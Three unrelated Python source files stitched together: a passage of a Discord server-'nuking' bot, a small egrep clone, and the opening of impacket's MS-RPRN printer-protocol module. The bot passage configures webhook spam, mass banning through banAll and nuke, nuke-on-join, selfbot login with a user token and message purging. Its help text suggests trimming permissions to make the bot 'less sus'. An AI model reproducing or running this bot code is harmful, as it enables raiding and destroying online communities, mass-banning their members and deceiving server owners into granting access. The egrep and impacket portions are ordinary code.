if item.isdigit() and (0 <= (item := int(item)) - offset <= initial_length - offset):
del settings['webhook_spam']['usernames'][item - offset]
offset += 1
else:
await log(ctx, f'Skipped deleting line `{item}` -> not an integer between 1 and {str(initial_length)}.')
await log(ctx, f'Successfully removed `{str(offset - 1)}` items.')
else:
await log(ctx, f'Enter line(s) to remove from usernames.')
elif args[1] == 'list':
await embed_list(args[2] if len(args) > 2 else '1', 'webhook_spam usernames list', settings['webhook_spam']['usernames'])
else:
await log(ctx, f'Unknown operation: `{args[1]}`')
elif args[0] == 'pfp_urls' or args[0] == 'pfp_url' or args[0] == 'pfp':
if args[1] == 'add':
if len(args) > 1 and args[2].lower() == 'none':
settings['webhook_spam']['pfp_urls'].append(None)
await log(ctx, f'No pfp item has been added')
elif len(args) > 1 and args[2].startswith(('https://', 'http://')):
settings['webhook_spam']['pfp_urls'].append(args[2])
await log(ctx, f'URL added.')
else:
await log(ctx, f'Please enter an **image URL**. Note: the link must start with http(s) protocals. Or enter `none` for no pfp.')
elif args[1] == 'remove':
if len(args) > 2:
del args[0], args[0]
offset = 1
initial_length = len(settings['webhook_spam']['pfp_urls'])
for item in args:
if item.isdigit() and (0 <= (item := int(item)) - offset <= initial_length - offset):
del settings['webhook_spam']['pfp_urls'][item - offset]
offset += 1
else:
await log(ctx, f'Skipped deleting line `{item}` -> not an integer between 1 and {str(initial_length)}.')
await log(ctx, f'Successfully removed `{str(offset - 1)}` items.')
else:
await log(ctx, f'Enter line(s) to remove from pfp_urls.')
elif args[1] == 'list':
await embed_list(args[2] if len(args) > 2 else '1', 'webhook_spam pfp_urls list', settings['webhook_spam']['pfp_urls'])
else:
await log(ctx, f'Unknown operation: `{args[1]}`')
elif args[0] == 'contents' or args[0] == 'content':
if args[1] == 'add':
if len(args) > 1 and (0 < len(text := ' '.join(args[2:])) <= 2000):
settings['webhook_spam']['contents'].append(text)
await log(ctx, f'Text added. Character length: `{str(len(text))}`.')
else:
await log(ctx, f'Please enter something that has 1 to 2000 characters.')
elif args[1] == 'remove':
if len(args) > 2:
del args[0], args[0]
offset = 1
initial_length = len(settings['webhook_spam']['contents'])
for item in args:
if item.isdigit() and (0 <= (item := int(item)) - offset <= initial_length - offset):
del settings['webhook_spam']['contents'][item - offset]
offset += 1
else:
await log(ctx, f'Skipped deleting line `{item}` -> not an integer between 1 and {str(initial_length)}.')
await log(ctx, f'Successfully removed `{str(offset - 1)}` items.')
else:
await log(ctx, f'Enter line(s) to remove from contents.')
elif args[1] == 'list':
await embed_list(args[2] if len(args) > 2 else '1', 'webhook_spam contents list', settings['webhook_spam']['contents'])
else:
await log(ctx, f'Unknown operation: `{args[1]}`')
else:
await log(ctx, f'Unknown type: `{args[0]}`')
elif command == 'after':
if args is None:
status_list = []
features_list = []
features_list.append('after')
if len(settings['after']) == 0:
status_list.append(':x:')
else:
status_list.append(':white_check_mark:')
theColor = randint(0, 0xFFFFFF)
embed = discord.Embed(
title = 'After commands',
description = f'All the commands in this list will run after `{settings["command_prefix"]}nuke`. It can be disabled by adding "false" after the nuke command: `{settings["command_prefix"]}nuke false`.\n\n:white_check_mark: = Ready to use\n:x: = Needs to config\ncolor: #{hex(theColor)[2:].zfill(6)}',
color = theColor
)
embed.add_field(name='Status', value='\n'.join(status_list), inline=True)
embed.add_field(name='Features', value='\n'.join(features_list), inline=True)
embed.add_field(name='Usage', value=f'`after add <command>` - add command to the back of the command list\n\n`after remove <line number> [line number] [line...` - remove line(s) in the command list\n\n`after insert <line number> <command>` - insert command after the given line. Note: use `insert 0 <command>` to insert the command to the first line\n\n`after list [page number]` - list commands that are in the command list', inline=False)
embed.set_footer(text=f'Config is saved' if configIsSaved() else '(*)Config is not saved')
await ctx.send(embed=embed)
else:
args = args.split()
if args[0] == 'add':
if len(args) > 1:
text = ' '.join(args[1:])
settings['after'].append(text)
await log(ctx, f'Command added. Character length: `{str(len(text))}`.')
else:
await log(ctx, f'Please enter the command you want to add after line `{len(settings["after"])}`.')
elif args[0] == 'remove':
if len(args) > 1:
del args[0]
offset = 1
initial_length = len(settings['after'])
for item in args:
if item.isdigit() and (0 <= (item := int(item)) - offset <= initial_length - offset):
del settings['after'][item - offset]
offset += 1
else:
await log(ctx, f'Skipped deleting line `{item}` -> not an integer between 1 and {str(initial_length)}.')
await log(ctx, f'Successfully removed `{str(offset - 1)}` items.')
else:
await log(ctx, f'Enter the line(s) that you want to remove from after commands.')
elif args[0] == 'insert':
if len(args) > 2 and args[1].isdigit():
if not (0 <= (index := int(args[1])) <= len(settings['after'])) or len(settings['after']) == 0:
await log(ctx, f'Line `{args[1]}` doesn\'t exist.')
return
settings['after'].insert(index, ' '.join(args[2:]))
await log(ctx, f'Added command after line `{args[1]}`.')
else:
await log(ctx, 'Insert usage: `after insert <after line #> <command...>`')
elif args[0] == 'list':
await embed_list(args[1] if len(args) > 1 else '1', 'after command(s) list', settings['after'])
else:
await log(ctx, f'Unknown operation: `{args[0]}`')
elif command == 'bot_status':
if args is None:
theColor = randint(0, 0xFFFFFF)
embed = discord.Embed(
title = 'bot_status',
description = f'Whenever the bot boot up the status will be set to a given status.\n\ncolor: #{hex(theColor)[2:].zfill(6)}',
color = theColor
)
embed.add_field(name='Status', value=f'{settings["bot_status"]}', inline=True)
embed.add_field(name='Features', value='bot_status', inline=True)
embed.add_field(name='Usage', value=f'`bot_status <on start status>` - set the on start status. Available on start status are `online`, `offline`, `idle`, and `dnd` or `do_not_disturb`. By default it is set to `offline`.', inline=False)
embed.set_footer(text=f'Config is saved' if configIsSaved() else '(*)Config is not saved')
await ctx.send(embed=embed)
else:
if (args := args.lower()) in ['online', 'offline', 'idle', 'dnd', 'do_not_disturb']:
settings['bot_status'] = args
await log(ctx, 'On bot start status has been set to `{args}`.')
else:
await log(ctx, 'Available on start status are `online`, `offline`, `idle`, and `dnd` or `do_not_disturb`.')
elif command == 'bot_permission':
if args is None:
theColor = randint(0, 0xFFFFFF)
embed = discord.Embed(
title = 'bot_permission',
description = f'If you are using a selfbot, then you don\'t have to do anything to this section. This bot_permission section is for normal bot invite URL that will ask the person inviting it for permission/roles (ex. admin, server manager). The default is set to 2146958847, which asks for all permissions. If you want to make the bot less sus, you can remove the permissions that are not needed.\n\ncolor: #{hex(theColor)[2:].zfill(6)}',
color = theColor
)
embed.add_field(name='Value', value=f'{settings["bot_permission"]}', inline=True)
embed.add_field(name='Features', value='bot_permission', inline=True)
embed.add_field(name='Usage', value=f'`bot_permission <value>` - set permissions value to the given number. Use this [permission calculator](https://wizbot.cc/permissions-calculator/?v=0) to help you calculate the values. Note: if you are going to use that calculator all you need is to copy the number that is display at the top, and then use this command.', inline=False)
embed.set_footer(text=f'Config is saved' if configIsSaved() else '(*)Config is not saved')
await ctx.send(embed=embed)
else:
if args.isdigit() and 0 <= int(args) <= 2146958847:
settings['bot_permission'] = args
await log(ctx, 'Bot permission has been set to `{args}`.')
else:
await log(ctx, 'Please enter a value between 0 and 2146958847.')
elif command == 'save':
def check(message: discord.Message):
return message.author.id == ctx.message.author.id
if args is None:
await log(ctx, f'You need to name the file. Use `{settings["command_prefix"]}save <file name>`.')
return
parent_dir = os.path.join(Path().absolute().__str__(), 'data')
config_path = os.path.join(parent_dir, args.translate(bad_filename_map))
if os.path.isfile(config_path):
await log(ctx, f'Configuration file named {args} already exist. Do you want to overwrite it? [Y/n]')
while True:
try:
msg = (await client.wait_for('message', check=check, timeout=10)).content.lower()
if msg == 'y' or msg == 'yes':
with open(config_path, 'w') as f:
f.write(json.dumps(settings))
break
elif msg == 'n' or msg == 'no':
await log(ctx, f'Saving cancelled.')
return
await log(ctx, f'Yes or no.')
except (asyncio.exceptions.TimeoutError, discord.ext.commands.errors.CommandInvokeError):
await log(ctx, "Took too long to answer.")
return
else:
if not os.path.isdir(parent_dir):
os.mkdir(parent_dir)
with open(config_path, 'w+') as f:
f.write(json.dumps(settings))
global settings_copy
settings_copy = deepcopy(settings)
await log(ctx, 'Finished saving.')
elif command == 'verbose':
if args is None:
status_list = []
features_list = []
# hard coding this because I don't think there's a better way to set the values.
features_list.append('Log response from requests')
if want_log_request:
status_list.append(':white_check_mark:')
else:
status_list.append(':x:')
features_list.append('Log messages in console')
if want_log_console:
status_list.append(':white_check_mark:')
else:
status_list.append(':x:')
features_list.append('Log messages in discord chat')
if want_log_message:
status_list.append(':white_check_mark:')
else:
status_list.append(':x:')
features_list.append('Log any errors')
if want_log_errors:
status_list.append(':white_check_mark:')
else:
status_list.append(':x:')
theColor = randint(0, 0xFFFFFF)
embed = discord.Embed(
title = 'verbose',
description = f'Verbose is the log level. Meaning that if you don\'t want any one of the logs to spam rate limiting errors or whatever errors that the bot is going to throw at you, you can disable them to prevent some lag.\n\nCurrent verbose value: `{str(settings["verbose"])}`\n:white_check_mark: = Enabled\n:x: = Disabled\ncolor: #{hex(theColor)[2:].zfill(6)}',
color = theColor
)
embed.add_field(name='Status', value='\n'.join(status_list), inline=True)
embed.add_field(name='Logs', value='\n'.join(features_list), inline=True)
embed.add_field(name='Usage', value=f'`verbose <value>` - enable and disable the logs. Subtracting the values below from the current verbose to disable the log(s) you want, and adding the values will enable them. For example if I want to disable "Log any error" I will subtract 8 from 15 to get 7 and use 7 as the new verbose value to set, if I want to disable more like "Log response from request" I will substract 1 from 7 to get 6. To enable them back just add 8 and 1 to the current verbose value.\n\n`1` - Log response from requests\n`2` - Log messages in console\n`4`- Log messages in discord chat\n`8` - Log any errors.', inline=False)
embed.set_footer(text=f'Config is saved' if configIsSaved() else '(*)Config is not saved')
await ctx.send(embed=embed)
else:
if args.isdigit() and 0 <= (args := int(args)) <= 15:
settings['verbose'] = args
updateVerbose()
await log(ctx, 'On bot start status has been set to `{args}`.')
else:
await log(ctx, 'You can only enter a positve integer between or on 0 and 15.')
elif command == 'ban_whitelist':
if args is None:
status_list = []
features_list = []
features_list.append('ban_whitelist')
if len(settings['ban_whitelist']) == 0:
status_list.append(':x:')
else:
status_list.append(':white_check_mark:')
theColor = randint(0, 0xFFFFFF)
embed = discord.Embed(
title = 'Ban whitelist',
description = f'Ban whitelist is used for telling `{settings["command_prefix"]}banAll` and `{settings["command_prefix"]}nuke` to not ban the users in the list. You can put discord tag or discord ID in the list, but it is recommended to use discord ID because in the pass there has some uncheckable discord tags.\n\n:white_check_mark: = Ready to use\n:x: = Needs to config\ncolor: #{hex(theColor)[2:].zfill(6)}',
color = theColor
)
embed.add_field(name='Status', value='\n'.join(status_list), inline=True)
embed.add_field(name='Features', value='\n'.join(features_list), inline=True)
embed.add_field(name='Usage', value=f'`ban_whitelist add <command>` - add user to the back of the command list\n\n`ban_whitelist remove <line number> [line number] [line...` - remove line(s) in the ban whitelist\n\n`ban_whitelist list [page number]` - list users that are in the ban whitelist', inline=False)
embed.set_footer(text=f'Config is saved' if configIsSaved() else '(*)Config is not saved')
await ctx.send(embed=embed)
else:
args = args.split()
if args[0] == 'add':
if len(args) > 1:
text = ' '.join(args[1:])
settings['ban_whitelist'].append(text)
await log(ctx, f'User added. Character length: `{str(len(text))}`.')
else:
await log(ctx, f'Please enter the userID or userTag that you want to add after line `{str(len(settings["after"]))}`.')
elif args[0] == 'remove':
if len(args) > 1:
del args[0]
offset = 1
initial_length = len(settings['ban_whitelist'])
for item in args:
if item.isdigit() and (0 <= (item := int(item)) - offset <= initial_length - offset):
del settings['ban_whitelist'][item - offset]
offset += 1
else:
await log(ctx, f'Skipped deleting line `{item}` -> not an integer between 1 and {str(initial_length)}.')
await log(ctx, f'Successfully removed `{str(offset - 1)}` items.')
else:
await log(ctx, f'Enter line(s) to remove from usernames.')
elif args[0] == 'list':
await embed_list(args[1] if len(args) > 1 else '1', 'ban whitelist', settings['ban_whitelist'])
else:
await log(ctx, f'Unknown operation: `{args[0]}`')
elif command == 'proxies':
await log(ctx, 'This feature has been disabled for now due to unhandled slow/bad proxies.')
elif command == 'prefix' or command == 'command_prefix':
if args is None:
await log(ctx, f'Use `` {command_prefix}config command_prefix <command_prefix> ``')
else:
settings['command_prefix'] = client.command_prefix = args
await log(ctx, 'Command prefix changed.')
elif command == 'token':
if args is None:
await log(ctx, 'Usage: `token <new token>` - new token for this config. Restarting the bot will be required. Remember to save the config before restarting.')
else:
settings['token'] = args
await log(ctx, 'New token has been set.')
else:
await log(ctx, f'Unable to find the config. `{command}`')
## Additional functions ##
@commands.check(checkPerm)
@client.command(name='checkRolePermissions', aliases=['check', 'crp'])
async def checkRolePermissions(ctx, name, n='1'):
if not await hasTarget(ctx):
return
if not n.isdigit() or (n := int(n) - 1) < 0:
await log(ctx, 'Bad page number.')
return
member_ = containing(selected_server.members, nameIdHandler(name))
if member_ is None:
await log(ctx, f'Unable to found {name}.')
return
value = member_.guild_permissions.value
temp = sorted(member_.guild_permissions, key=lambda p: p)
master_list = ''
item_length = 31
init_item = n * per_page
final_item = init_item + per_page
if init_item > item_length - per_page:
if init_item > item_length:
await ctx.send('Invalid page number.')
return
final_item = init_item + (item_length % per_page)
else:
final_item = init_item + per_page
for i in range(init_item, final_item, 1):
item, has_perm = temp[i]
if has_perm:
master_list += ':white_check_mark: '
else:
master_list += ':x: '
master_list += item.replace('_', ' ').capitalize() + '\n'
# if not isDM(ctx) and ctx.guild.id == selected_server.id and 1 << 11 & selected_server.me.guild_permissions.value == 0:
# consoleLog('\n%s*Check role permissions*\n%sPermission value -> %s%d : 2147483647\n%s %s%d/%d' % (Fore.CYAN, Fore.RESET, Fore.YELLOW, value, master_list.replace(':white_check_mark:', f'{Fore.GREEN}+').replace(':x:', f'{Fore.RED}-'), Fore.YELLOW, n+1, ceil(item_length / per_page)), True)
# else:
try:
embed = discord.Embed(
title = 'User permissions',
description = f'Encoded value: {str(value)} : 2147483647',
color = discord.Color.red()
)
embed.add_field(name='Permissions', value=master_list, inline=True)
embed.set_footer(text=f'{str(n+1)}/{str(ceil(item_length / per_page))}')
await ctx.send(embed=embed)
except:
await ctx.send('```diff\n%s %d/%d```' % (master_list.replace(':white_check_mark:', '+').replace(':x:', '-'), n+1, ceil(item_length / per_page)))
@commands.check(checkPerm)
@client.command(name='serverIcon', aliases=['si', 'changeServerIcon'])
async def serverIcon(ctx, path=None):
if not await hasTarget(ctx):
return
if path is None:
await selected_server.edit(icon=None)
await log(ctx, f'Successfully removed the server icon from `{selected_server.name}`.')
elif path.startswith(('https://', 'http://', 'ftp://', 'ftps://')): # Link EX: https://www.example.com/aaa.png
try:
await selected_server.edit(icon=BytesIO(requests.get(path).content).read())
consoleLog('Successfully changed the current server icon.')
except:
consoleLog(f'Unable to change the server icon to "{path}".')
elif path[0] == '<': # EX: <a:triggeredd:627060014431076352>
path = path.split(':')
try:
if path[0] == '<a': # Animated
await selected_server.edit(icon=discord.File(BytesIO(requests.get(f'https://cdn.discordapp.com/emojis/{path[2][:-1]}.gif?v=1').content).read()))
else:
await selected_server.edit(icon=BytesIO(requests.get(f'https://cdn.discordapp.com/emojis/{path[2][:-1]}.png?v=1').content).read())
await log(ctx, 'Successfully changed the server icon.')
except:
raise
elif os.path.isfile(path): # File EX: C:\Users\user\Desktop\something.jpg or EX: .\icon\something.jpg
with open(path, 'rb') as data:
await selected_server.edit(icon=data.read())
await log(ctx, 'Successfully changed the server icon.')
else:
try:
unicode_number = str(ord(path)) + ', '
except:
unicode_number = ''
unicode_string = path.encode('utf8')
sys.stdout.buffer.write(f'"{path}" is not supported to be set as a server icon.'.encode('utf8'))
consoleLog(unicode_number)
await log(ctx, f'{path} is not supported to be set as a server icon.')
await log(ctx, f'Character\'s bytes: {unicode_number}{unicode_string}')
@commands.check(checkPerm)
@client.command(name='serverName', aliases=['sn', 'changeServerName'])
async def serverName(ctx, *, name):
if not await hasTarget(ctx):
return
try:
await selected_server.edit(name=name)
await log(ctx, f'Server name has been changed to `{name}`.')
except discord.errors.Forbidden:
await log(ctx, 'Unable to change the server name.')
raise
except:
raise
@commands.check(checkPerm)
@client.command(name='purge', aliases=['clear'])
async def purge(ctx, n=None):
if not await hasTarget(ctx):
return
consoleLog('Purging messages...', True)
if n is not None and (not n.isdigit() or (n := int(n)) < 1):
await log(ctx, 'Please enter a positive integer.')
return
to_delete_messages = await ctx.channel.history(limit=n).flatten()
consoleLog('Due to discord ratelimitings purging messages cannot be run in a fast pace. After every message the bot will timeout for 3 seconds', True)
delay_time = 0
for message in to_delete_messages:
while True:
await asyncio.sleep(delay_time)
r = requests.delete(f'https://discord.com/api/v8/channels/{ctx.channel.id}/messages/{message.id}', headers=headers)
if r.status_code == 429:
delay_time = r.json()['retry_after']
consoleLog(f'ratelimiting reached. Purging delay has been set to -> {str(delay_time)} seconds')
else:
break
@commands.check(checkPerm)
@client.command(name='leave')
async def leave(ctx, name=None):
if name is None:
if not await hasTarget(ctx):
return
await selected_server.leave()
else:
server = containing(client.guilds, name)
if server is None:
await log(ctx, f'Unable to find server {name}.')
return
await server.leave()
if not isDM(ctx) and ctx.guild.id == selected_server.id:
consoleLog(f'{Fore.BLUE}Goodbye {selected_server.name}! {Fore.YELLOW}-> {Fore.GREEN}Left {Fore.RESET}{selected_server.name}.', True)
else:
await log(ctx, f'Goodbye {selected_server.name}! -> Left {selected_server.name}.')
@commands.check(checkPerm)
@client.command(name='leaveAll')
async def leaveAll(ctx):
await log(ctx, 'Leaving all servers. Note: You won\'t be able to message me after I left all servers.')
for server in client.guilds:
await server.leave()
consoleLog('Left all servers.', True)
@commands.check(checkPerm)
@client.command(name='joinNuke', aliases=['nukeOnJoin', 'join nuke'])
async def joinNuke(ctx, true_or_false):
global saved_ctx, nuke_on_join
if true_or_false.lower() == 'true':
saved_ctx = ctx
nuke_on_join = True
await log(ctx, 'Nuke on bot joining a new server has been turned on.')
elif true_or_false.lower() == 'false':
nuke_on_join = False
await log(ctx, 'Nuke on bot joining a new server has been turned off.')
else:
await log(ctx, 'Invalid flag: true or false. Note: true or false is not case sensitive.')
@commands.check(checkPerm)
@client.command(name='changeStatus', aliases=['cs'])
async def changeStatus(ctx, status):
    """Change the bot's presence to the named discord status.

    Unknown status strings are silently ignored, matching the original
    if/elif chain which had no else branch.
    """
    presence_map = {
        'offline': discord.Status.offline,
        'invisible': discord.Status.invisible,
        'online': discord.Status.online,
        'idle': discord.Status.idle,
        'dnd': discord.Status.do_not_disturb,
        'do_not_disturb': discord.Status.do_not_disturb,
    }
    target = presence_map.get(status)
    if target is not None:
        await client.change_presence(status=target)
@commands.check(checkPerm)
@client.command(name='link', aliases=['l'])
async def link(ctx):
    """Send the OAuth2 invite link for this bot (bot accounts only)."""
    if is_selfbot:
        # Self/user accounts have no OAuth2 invite link.
        await log(ctx, f'This account is not a bot :). You can join servers with invite codes.')
    else:
        await ctx.channel.send(f'https://discord.com/api/oauth2/authorize?client_id={client.user.id}&permissions={settings["bot_permission"]}&scope=bot')
@commands.check(checkPerm)
@client.command(name='autoNick', aliases=['an'])
async def autoNick(ctx):
    """Toggle randomly re-rolling the bot's nickname on the selected server.

    The first invocation sets auto_nick and then loops *inside this
    command*, renaming the bot to a random 10-character alphanumeric
    nick. A second invocation flips auto_nick off, which makes the loop
    in the first invocation terminate.
    """
    if not await hasTarget(ctx):
        return
    global auto_nick
    if not auto_nick:
        consoleLog(f'{Fore.CYAN}Auto nickname is on.', True)
        auto_nick = True
        # NOTE(review): no sleep between edits -- this hammers the nickname
        # endpoint back-to-back and will be rate limited; confirm intended.
        while auto_nick:
            # payload = {'nick': ''.join(choice(alphanum) for _ in range(10))}
            # q.put((requests.patch, f'https://discord.com/api/v8/guilds/{selected_server.id}/members/%40me/nick', headers, payload))
            await selected_server.me.edit(nick=''.join(choices(alphanum, k=10)))
    else:
        consoleLog(f'{Fore.BLUE}Auto nickname is off.', True)
        auto_nick = False
@commands.check(checkPerm)
@client.command(name='autoStatus', aliases=['as'])
async def autoStatus(ctx):
    """Toggle rapidly flipping the bot's presence between online/offline.

    Same toggle pattern as autoNick: the first invocation loops inside
    this command; a second invocation clears auto_status, ending the loop.
    """
    global auto_status
    if not auto_status:
        consoleLog(f'{Fore.CYAN}Auto status is on.', True)
        auto_status = True
        while auto_status:
            await client.change_presence(status=discord.Status.online)
            # The exact presence-update rate limit is unknown to the author;
            # a short randomized sleep keeps the requests spaced out.
            await asyncio.sleep(random() + 0.3)
            await client.change_presence(status=discord.Status.offline)
            await asyncio.sleep(random() + 0.3)
    else:
        consoleLog(f'{Fore.BLUE}Auto status is off.', True)
        auto_status = False
@commands.check(checkPerm)
@client.command(name='off', aliases=['logout', 'logoff', 'shutdown', 'stop'])
async def off(ctx):
    """Set the presence to offline, then log the client out."""
    ### Discord takes too long to realize if the bot is offline people might get confused about the not turning off the bot vs discord takes time to update
    # NOTE(review): changeStatus is a discord.py Command object at this point;
    # calling it directly relies on Command being awaitable -- confirm on the
    # discord.py version in use. client.logout() is the pre-2.0 API.
    await changeStatus(None, 'offline')
    await client.logout()
###### Closing handler ######
###### https://github.com/aio-libs/aiohttp/issues/4324
from functools import wraps
from asyncio.proactor_events import _ProactorBasePipeTransport
def silence_event_loop_closed(func):
    """Decorate *func* so a spurious ``RuntimeError('Event loop is closed')``
    is swallowed while every other exception propagates unchanged.

    Used to silence the noisy ProactorBasePipeTransport.__del__ error on
    interpreter shutdown (see aiohttp issue #4324).
    """
    @wraps(func)
    def wrapper(self, *args, **kwargs):
        try:
            return func(self, *args, **kwargs)
        except RuntimeError as exc:
            if str(exc) == 'Event loop is closed':
                return None
            raise
    return wrapper
# Monkey-patch the Proactor transport destructor so "Event loop is closed"
# RuntimeErrors raised during interpreter shutdown (Windows) are silenced.
_ProactorBasePipeTransport.__del__ = silence_event_loop_closed(_ProactorBasePipeTransport.__del__)
# PrivilegedIntents fixed fail :')
# async def login():
# global client
# try:
# await client.start(settings['token'], bot=not is_selfbot)
# except discord.PrivilegedIntentsRequired:
# print('PrivilegedIntentsRequired: This field is required to request for a list of members in the discord server that the bot is connected to. Watch https://youtu.be/DXnEFoHwL1A?t=44 to see how to turn on the required field.')
# # exit()
# client._connection = client._get_state(
# intents=client.intents.default()
# ) # reset intents to default
# input('lol')
# await login()
# except Exception as e:
# print(e)
# finally:
# sys.stdout.write('Exiting... \n')
# asyncio.run(login()) # if login failed because of the privileged intents then ask if user wants to turn off the intents
# Start the bot. bot=not is_selfbot logs in as a regular user account when
# selfbot mode is enabled (only supported by old discord.py releases).
try:
    client.run(settings['token'], bot=not is_selfbot)
except discord.PrivilegedIntentsRequired:
    print('PrivilegedIntentsRequired: This field is required to request for a list of members in the discord server that the bot is connected to. Watch https://youtu.be/DXnEFoHwL1A?t=44 to see how to turn on the required field.')
    exit()
except Exception as e:
    # Catch-all so the script always reaches the exit message below.
    print(e)
finally:
    sys.stdout.write('Exiting... \n')
|
import re,argparse,sys,os
from argparse import RawDescriptionHelpFormatter
from colorprint.printer import uprint
from colorprint.unicolor import FOREGROUND_GREEN,FOREGROUND_RED,FOREGROUND_PINK
# Translation of the option notes below (original in Chinese):
#   --color  highlight matches with color
#   -v       invert the match condition
#   -i       ignore case
#   -c       count matching lines
#   -q       quiet: no output, used for checks ($? == 0 means matched)
#   -n       show the line number of each match
# NOTE(review): -q and --color are described here but never registered
# with argparse below -- confirm whether they were dropped deliberately.
'''
--color 用颜色显示出来
-v 条件取反
-i 忽略大小写
-c 统计匹配的行数
-q 静默,无任何输出,一般用于检测。如果$?是0说明有匹配,否则没有
-n 显示出匹配结果所在的行号
'''
# usage = "Usage: grep [OPTION]... PATTERN [FILE]..."
usage = None
description = '''Search for PATTERN in each FILE or standard input.
PATTERN is, by default, a basic regular expression (BRE).
Example: egrep -i 'hello world' menu.h main.c'''
epilog ='''This egrep is an imitation of egrep in linux, I try my best to do it but as you
can see, it's not completed.
When FILE is -, read standard input. With no FILE, read . if a command-line
-r is given, - otherwise. If fewer than two FILEs are given, assume -h.
Exit status is 0 if any line is selected, 1 otherwise;
if any error occurs and -q is not given, the exit status is 2.
Report bugs to: <EMAIL>
my github page: <http://www.gnu.org/software/grep/>
'''
prog = "egrep"
# Command-line interface: boolean flags plus a required PATTERN and one or
# more FILE arguments.
parser = argparse.ArgumentParser(prog=prog,
usage=usage,
description=description,
epilog=epilog,
formatter_class=RawDescriptionHelpFormatter)
parser.add_argument("-v","--invert-match",
dest="invert_match",
action="store_true",
help="select non-matching lines",
default=False,)
# NOTE(review): dest "ignorec_case" is a typo for "ignore_case", but it is
# read back consistently below (args.ignorec_case), so behavior is unaffected.
parser.add_argument("-i","--ignore-case",
dest="ignorec_case",
action="store_true",
help="ignore case distinctions",
default=False,)
parser.add_argument("-n","--line-number",
dest="line_number",
action="store_true",
help="print line number with output lines",
default=False,)
parser.add_argument("-c","--count",
dest="count",
action="store_true",
help="print only a count of matching lines per FILE",
default=False,)
parser.add_argument("-o","--only-matching",
dest="only_matching",
action="store_true",
help="show only the part of a line matching PATTERN",
default=False,)
# parser.add_argument("-v","--nn",
# dest="invert_match",
# action="store_true", #store,store_const,store_true/store_false,append,append_const,version
# type = str,
# default="",
# nargs=1)
parser.add_argument('PATTERN',
metavar='PATTERN',
type=str,
help='By default, a basic regular expression (BRE).')
parser.add_argument('FILE',
metavar='FILE',
type=str,
nargs='+',
help='place markdown path')
args = parser.parse_args()
# Unpack parsed flags into module-level names used by the matching loop.
ignore_case = args.ignorec_case
pattern = args.PATTERN
invert_match = args.invert_match
line_number = args.line_number
only_matching = args.only_matching
count = args.count
files = args.FILE
# Compile the pattern once; -i adds IGNORECASE.
if ignore_case:
    egrex = re.compile(pattern,re.IGNORECASE)
else:
    egrex = re.compile(pattern)
all_num = 0        # total matching lines across all files (drives exit status)
multi_file = len(files) != 1   # prefix output with the file name when >1 FILE
for file in files:
    # print(file)
    cur_num = 0    # matching lines in the current file (for -c)
    # Files are opened in binary and decoded per line.
    # NOTE(review): .decode() assumes UTF-8 input -- confirm; undecodable
    # bytes will raise UnicodeDecodeError here.
    with open(file,"rb") as f:
        for i,line in enumerate(f):
            line = line.decode().strip("\n")
            match = re.search(egrex,line)
            if match is None and invert_match:
                # -v: a non-matching line counts as selected.
                cur_num += 1
                if not only_matching:
                    if not count:
                        if multi_file:
                            uprint(file, fore=FOREGROUND_PINK)
                        if line_number:
                            uprint(f"{i + 1}:", fore=FOREGROUND_GREEN)
                        uprint(line,end="\n")
            elif match is not None and not invert_match:
                cur_num += 1
                if not count:
                    if multi_file:
                        uprint(file, fore=FOREGROUND_PINK)
                    if line_number:
                        uprint(f"{i + 1}:", fore=FOREGROUND_GREEN)
                    # Without -n the multi-file prefix still needs a separator.
                    elif multi_file:
                        uprint(f":", fore=FOREGROUND_GREEN)
                    if only_matching:
                        # -o: print only the matched substring, highlighted.
                        uprint(line[match.start():match.end()],fore=FOREGROUND_RED,end="\n")
                    else:
                        # Print the line with the matched span highlighted in red.
                        uprint(line[0:match.start()])
                        uprint(line[match.start():match.end()],fore=FOREGROUND_RED)
                        uprint(line[match.end():],end="\n")
    if count:
        # -c: one count line per file ("file:count" when several files).
        if multi_file:
            uprint(file,fore=FOREGROUND_PINK)
            uprint(":",fore=FOREGROUND_GREEN)
        uprint(cur_num,end="\n")
    all_num += cur_num
# grep convention: exit 0 if anything matched, 1 otherwise.
if all_num == 0:
    print(f"pattern:{pattern} matches none.")
    exit(1)
else:
    exit(0)
|
# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Author: <NAME> (@agsolino)
#
# Description:
# [MS-RPRN] Interface implementation
#
# Best way to learn how to use these calls is to grab the protocol standard
# so you understand what the call does, and then read the test case located
# at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC
#
# Some calls have helper functions, which makes it even easier to use.
# They are located at the end of this file.
# Helper functions start with "h"<name of the call>.
# There are test cases for them too.
#
from impacket import system_errors
from impacket.dcerpc.v5.dtypes import ULONGLONG, UINT, USHORT, LPWSTR, DWORD, ULONG, NULL
from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDRUNION, NDRPOINTER, NDRUniConformantArray
from impacket.dcerpc.v5.rpcrt import DCERPCException
from impacket.uuid import uuidtup_to_bin
MSRPC_UUID_RPRN = uuidtup_to_bin(('12345678-1234-ABCD-EF00-0123456789AB', '1.0'))
class DCERPCSessionError(DCERPCException):
    """DCERPCException specialization that renders RPRN error codes using
    the Win32 system error table when the code is known."""

    def __init__(self, error_string=None, error_code=None, packet=None):
        DCERPCException.__init__(self, error_string, error_code, packet)

    def __str__(self):
        code = self.error_code
        messages = system_errors.ERROR_MESSAGES
        if code not in messages:
            return 'RPRN SessionError: unknown error code: 0x%x' % code
        short_msg, verbose_msg = messages[code]
        return 'RPRN SessionError: code: 0x%x - %s - %s' % (code, short_msg, verbose_msg)
################################################################################
# CONSTANTS
################################################################################
# 2.2.1.1.7 STRING_HANDLE
# STRING_HANDLE is an alias for a wide-string pointer ([MS-RPRN] 2.2.1.1.7).
STRING_HANDLE = LPWSTR
class PSTRING_HANDLE(NDRPOINTER):
    # Pointer to a STRING_HANDLE.
    referent = (
        ('Data', STRING_HANDLE),
    )
# 2.2.3.1 Access Values
# Several masks intentionally share a value (e.g. JOB_EXECUTE == JOB_WRITE,
# PRINTER_EXECUTE == PRINTER_READ == PRINTER_WRITE): they are composed from
# the same standard-rights bits, exactly as the spec defines them.
JOB_ACCESS_ADMINISTER = 0x00000010
JOB_ACCESS_READ = 0x00000020
JOB_EXECUTE = 0x00020010
JOB_READ = 0x00020020
JOB_WRITE = 0x00020010
JOB_ALL_ACCESS = 0x000F0030
PRINTER_ACCESS_ADMINISTER = 0x00000004
PRINTER_ACCESS_USE = 0x00000008
PRINTER_ACCESS_MANAGE_LIMITED = 0x00000040
